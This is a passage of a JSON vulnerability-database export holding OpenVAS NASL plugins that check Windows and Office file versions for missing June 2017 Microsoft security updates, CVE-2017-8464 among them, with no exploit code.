exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## MS Office\nofficeVer = get_kb_item(\"MS/Office/Ver\");\nif(!officeVer){\n exit(0);\n}\n\npath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\",\n item:\"ProgramFilesDir\");\nif(!path){\n exit(0);\n}\n\n##For x86 based installation\n##To Do, Check path for 64bit installation and update path here\noffPath = path + \"\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\Office16\";\n\nif(officeVer =~ \"^16\\.*\")\n{\n offdllVer = fetch_file_version(sysPath:offPath, file_name:\"mso30win32client.dll\");\n if(!offdllVer){\n exit(0);\n }\n\n if(offdllVer =~ \"^16\\.0\" && version_is_less(version:offdllVer, test_version:\"16.0.4561.1002\"))\n {\n report = 'File checked: ' + offPath + \"\\mso30win32client.dll\" + '\\n' +\n 'File version: ' + 
offdllVer + '\\n' +\n 'Vulnerable range: ' + \"16.0 - 16.0.4561.1001\" + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:18:55", "description": "This host is missing a critical security\n update according to Microsoft security update KB4022839.", "cvss3": {}, "published": "2017-06-16T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple RCE Vulnerabilities (KB4022839)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8464", "CVE-2017-8543", "CVE-2017-8552"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811208", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811208", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple RCE Vulnerabilities (KB4022839)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811208\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8464\", \"CVE-2017-8543\", \"CVE-2017-8552\");\n script_bugtraq_id(98818, 98824, 99035);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-16 16:41:25 +0530 (Fri, 16 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple RCE Vulnerabilities (KB4022839)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft security update KB4022839.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An error exists in 'Win32k' when the Windows kernel-mode driver fails to\n properly handle objects in memory.\n\n - An error in the Windows Search which fails to handles objects in memory.\n\n - An error in .LNK file due to processing of shortcut LNK references.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in kernel mode allowing attacker to install programs.\n View, change, or delete data, or create new accounts with full user rights.Also\n an attacker who successfully exploited this vulnerability could run processes\n in an elevated context.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 8 
x86/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-ph/help/4022839\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8:1, win8x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nwinVer = fetch_file_version(sysPath:sysPath, file_name:\"Shell32.dll\");\nif(!winVer){\n exit(0);\n}\n\nif(version_is_less(version:winVer, test_version:\"6.2.9200.22164\"))\n{\n report = 'File checked: ' + sysPath + \"\\Shell32.dll\" + '\\n' +\n 'File version: ' + winVer + '\\n' +\n 'Vulnerable range: ' + 'Less than 6.2.9200.22164' + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-09T17:47:14", "description": "Microsoft had released a Security Advisory 4025685 on June 14 to fix multiple critical security vulnerabilities in such systems as Microsoft Windows XP, Windows Server 2003, Windows VISTA, and Windows 8.", "cvss3": {}, "published": "2020-06-05T00:00:00", "type": "openvas", "title": "Huawei Data Communication: Multiple Vulnerabilities Released on Microsoft security advisory 4025685 (huawei-sa-20170909-01-windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8461", "CVE-2017-8464", "CVE-2017-8543", "CVE-2017-8487", "CVE-2017-8552", 
"CVE-2017-0176"], "modified": "2020-06-06T00:00:00", "id": "OPENVAS:1361412562310108777", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108777", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108777\");\n script_version(\"2020-06-06T12:09:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-06 12:09:29 +0000 (Sat, 06 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-05 08:17:40 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-8543\", \"CVE-2017-8464\", \"CVE-2017-8461\", \"CVE-2017-8487\", \"CVE-2017-8552\", \"CVE-2017-0176\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Huawei Data Communication: Multiple Vulnerabilities Released on Microsoft security advisory 4025685 (huawei-sa-20170909-01-windows)\");\n\n 
script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei\");\n script_dependencies(\"gb_huawei_vrp_network_device_consolidation.nasl\");\n script_mandatory_keys(\"huawei/vrp/detected\");\n\n script_tag(name:\"summary\", value:\"Microsoft had released a Security Advisory 4025685 on June 14 to fix multiple critical security vulnerabilities in such systems as Microsoft Windows XP, Windows Server 2003, Windows VISTA, and Windows 8.\");\n\n script_tag(name:\"insight\", value:\"Microsoft had released a Security Advisory 4025685 on June 14 to fix multiple critical security vulnerabilities in such systems as Microsoft Windows XP, Windows Server 2003, Windows VISTA, and Windows 8. Attackers can exploit these vulnerabilities to implement remote code execution or privilege elevation. (Vulnerability ID: HWPSIRT-2017-06114,HWPSIRT-2017-06115,HWPSIRT-2017-06131,HWPSIRT-2017-06133,HWPSIRT-2017-06153 and HWPSIRT-2017-06154)The six vulnerabilities have been assigned six Common Vulnerabilities and Exposures (CVE) IDs: CVE-2017-0176, CVE-2017-8461, CVE-2017-8464, CVE-2017-8487, CVE-2017-8543 and CVE-2017-8552.Huawei has released software updates to fix these vulnerabilities. 
This advisory is available in the linked references.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit these vulnerabilities to implement remote code execution or privilege elevation.\");\n\n script_tag(name:\"affected\", value:\"AnyOffice versions V200R002C10\n\nN2000 Appliance versions V100R001C00\n\nOceanStor 18500 versions V100R001C00 V100R001C10 V100R001C20 V100R001C30 V100R001C99\n\nOceanStor 18800 versions V100R001C00 V100R001C10 V100R001C20 V100R001C30 V100R001C99\n\nOceanStor Backup Software versions V100R001C00\n\nSMC2.0 versions V100R003C10 V100R005C00 V500R002C00 V600R006C00\n\nSecospace AntiDDoS8000 versions V100R001C00\n\nSecospace AntiDDoS8160 versions V100R001C00SPC300\n\nUC Audio Recorder versions V100R001C01\n\nUMA versions V300R001C00\n\neLog versions V200R003C10\n\neSpace ECS versions V200R003C00\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170909-01-windows-en\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n# nb: Unknown device (no VRP), no public vendor advisory or general inconsistent / broken data\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:23:17", "description": "This host is missing a critical security\n update according to Microsoft KB4022718", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": "openvas", "title": "Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4022718)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8472", 
"CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8489", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811178", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811178", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4022718)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811178\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8472\", \"CVE-2017-8473\", \"CVE-2017-8474\",\n \"CVE-2017-8527\", \"CVE-2017-8528\", \"CVE-2017-0282\", \"CVE-2017-8475\",\n \"CVE-2017-8476\", \"CVE-2017-8531\", \"CVE-2017-0283\", \"CVE-2017-0284\",\n \"CVE-2017-8477\", \"CVE-2017-8478\", \"CVE-2017-8479\", \"CVE-2017-8532\",\n \"CVE-2017-8533\", \"CVE-2017-0285\", \"CVE-2017-8480\", \"CVE-2017-8481\",\n \"CVE-2017-8543\", \"CVE-2017-0287\", \"CVE-2017-0288\", \"CVE-2017-8482\",\n \"CVE-2017-8483\", \"CVE-2017-8544\", \"CVE-2017-0289\", \"CVE-2017-0291\",\n \"CVE-2017-0292\", \"CVE-2017-8484\", \"CVE-2017-8485\", \"CVE-2017-8553\",\n \"CVE-2017-0294\", \"CVE-2017-0296\", \"CVE-2017-8488\", \"CVE-2017-8489\",\n \"CVE-2017-0297\", \"CVE-2017-0298\", \"CVE-2017-8490\", \"CVE-2017-8491\",\n \"CVE-2017-8492\", \"CVE-2017-0299\", \"CVE-2017-0300\", \"CVE-2017-8460\",\n \"CVE-2017-8462\", \"CVE-2017-8464\", \"CVE-2017-8470\", \"CVE-2017-8471\",\n \"CVE-2017-8469\", \"CVE-2017-8554\");\n script_bugtraq_id(98878, 98851, 98852, 98902, 98933, 98949, 98885, 98853, 98903,\n 98819, 98920, 98918, 98854, 98845, 98856, 98820, 98821, 98914,\n 98857, 98862, 98824, 98922, 98923, 98858, 98859, 98826, 98929,\n 98835, 98836, 98847, 98860, 98940, 98837, 98839, 98864, 98865,\n 98840, 98867, 98869, 98870, 98884, 98901, 98887, 98900, 98818,\n 98848, 98849, 98842);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", 
value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 17:00:32 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4022718)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022718\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Users cannot print enhanced metafiles (EMF) or documents containing bitmaps\n rendered out of bounds using the BitMapSection(DIBSection) function.\n\n - Security updates to Microsoft Windows PDF, Windows shell, Windows Kernel,\n Microsoft Graphics Component, Microsoft Uniscribe and Windows Kernel-Mode\n Drivers.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to gain the same user rights as the current user. If the current user is\n logged on with administrative user rights, an attacker who successfully exploited the\n vulnerability could take control of an affected system. An attacker could then install\n programs, view, change, or delete data or create new accounts with full user rights.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2012.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022718\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.2.9200.22168\"))\n{\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 6.2.9200.22168\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:20:02", "description": "This host is missing a critical security\n update according to Microsoft KB4022722", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022722)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0286", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-8490", "CVE-2017-8471", 
98824, 98922, 98923, 98862, 98858, 98859,\n 98826, 98932, 98954, 98955, 98929, 98835, 98836, 98847, 98860,\n 98837, 98839, 98865, 98840, 98867, 98869, 98884, 98901, 98887,\n 98870, 98850, 98855, 98900, 98818, 98848, 98849, 98926, 98928,\n 98930, 98843, 98844, 98846, 98895);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-15 16:09:05 +0530 (Thu, 15 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022727)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022727\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Users cannot print enhanced metafiles (EMF) or documents containing bitmaps\n rendered out of bounds using the BitMapSection (DIBSection) function.\n\n - Displays turn off unexpectedly even when 'Turn off display' is set to 'Never' in\n Power Options.\n\n - certutil.exe can no longer generate an export file (.epf) when attempting to\n recover a key for a version 1 certificate.\n\n - MSI files will no longer install when Device Guard is enabled.\n\n - A thin client becomes unusable and unresponsive when Unified Write Filter\n (UWF) with DISK mode is enabled causing NTFS errors with ID: 55 & ID: 130\n to be logged in the Event Logs.\n\n - Microsoft Edge improperly accesses objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to gain the same user rights as the current user. If the current user is logged\n on with administrative user rights, an attacker who successfully exploited the\n vulnerability could take control of an affected system. 
An attacker could then\n install programs. View, change, or delete data, or create new accounts with full\n user rights.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 for 32bit/x64-based Systems.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022727\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10240.0\", test_version2:\"11.0.10240.17442\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.10240.0 - 11.0.10240.17442\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:26:43", "description": "This host is missing a critical security\n update according to Microsoft KB4022714", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022714)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8531", "CVE-2017-8481", 
"CVE-2017-0218", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8522", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-8575", "CVE-2017-0300", "CVE-2017-8494", "CVE-2017-8548", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0216", "CVE-2017-0284", "CVE-2017-8518", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0219", "CVE-2017-8515", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811164", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811164", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022714)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811164\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8473\", \"CVE-2017-8474\", \"CVE-2017-8527\",\n \"CVE-2017-0216\", \"CVE-2017-0218\", \"CVE-2017-0219\", \"CVE-2017-0282\",\n \"CVE-2017-8475\", \"CVE-2017-8476\", \"CVE-2017-8477\", \"CVE-2017-8529\",\n \"CVE-2017-8530\", \"CVE-2017-8531\", \"CVE-2017-0283\", \"CVE-2017-0284\",\n \"CVE-2017-8478\", \"CVE-2017-8479\", \"CVE-2017-8532\", \"CVE-2017-8533\",\n \"CVE-2017-0285\", \"CVE-2017-0287\", \"CVE-2017-8480\", \"CVE-2017-8481\",\n \"CVE-2017-8543\", \"CVE-2017-0288\", \"CVE-2017-0289\", \"CVE-2017-8482\",\n \"CVE-2017-8483\", \"CVE-2017-8544\", \"CVE-2017-8547\", \"CVE-2017-8548\",\n \"CVE-2017-8549\", \"CVE-2017-0291\", \"CVE-2017-0292\", \"CVE-2017-8484\",\n \"CVE-2017-8485\", \"CVE-2017-0294\", \"CVE-2017-0296\", \"CVE-2017-8489\",\n \"CVE-2017-8490\", \"CVE-2017-0297\", \"CVE-2017-0298\", \"CVE-2017-0299\",\n \"CVE-2017-8491\", \"CVE-2017-8492\", \"CVE-2017-0300\", \"CVE-2017-8460\",\n \"CVE-2017-8493\", \"CVE-2017-8494\", \"CVE-2017-8462\", \"CVE-2017-8464\",\n \"CVE-2017-8470\", \"CVE-2017-8471\", \"CVE-2017-8522\", \"CVE-2017-8523\",\n \"CVE-2017-8524\", \"CVE-2017-8465\", \"CVE-2017-8466\", \"CVE-2017-8468\",\n \"CVE-2017-8515\", \"CVE-2017-8517\", \"CVE-2017-8554\", \"CVE-2017-8575\",\n \"CVE-2017-8518\");\n script_bugtraq_id(98878, 98852, 98902, 98933, 98896, 98897, 98898, 98885, 98853,\n 98903, 98854, 98953, 98863, 98819, 98920, 98918, 98845, 98856,\n 98820, 98821, 98914, 98922, 98857, 98862, 98824, 98923, 98929,\n 98858, 98859, 98826, 98932, 
98954, 98955, 98835, 98836, 98847,\n 98860, 98837, 98839, 98865, 98867, 98840, 98884, 98869, 98870,\n 98901, 98887, 98850, 98855, 98900, 98818, 98848, 98849, 98926,\n 98928, 98930, 98843, 98844, 98846, 98833, 98895);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 10:02:48 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022714)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022714\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exists in,\n\n - The metafiles (EMF) or documents containing bitmaps rendered out of bounds\n using the BitMapSection(DIBSection) function.\n\n - The certutil.exe can no longer generate an export file (.epf) when attempting\n to recover a key for a version 1 certificate.\n\n - Additional issues with updated time zone information, updates to the\n Access Point Name (APN) database and Internet Explorer. Security updates to\n Microsoft Scripting Engine, Microsoft Edge, Windows COM, Windows kernel, Windows\n kernel-mode drivers, Microsoft Uniscribe, Microsoft Graphics Component, Windows\n Shell, Microsoft Windows PDF and Internet Explorer. 
For more information about\n the security vulnerabilities resolved, please refer to the Security Update Guide.\n\n - Microsoft Edge improperly accesses objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to\n execute arbitrary code in the context of the current user, gain the same user\n rights as the current user, to take control of an affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1511 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022714\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.961\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.10586.0 - 11.0.10586.961\\n' 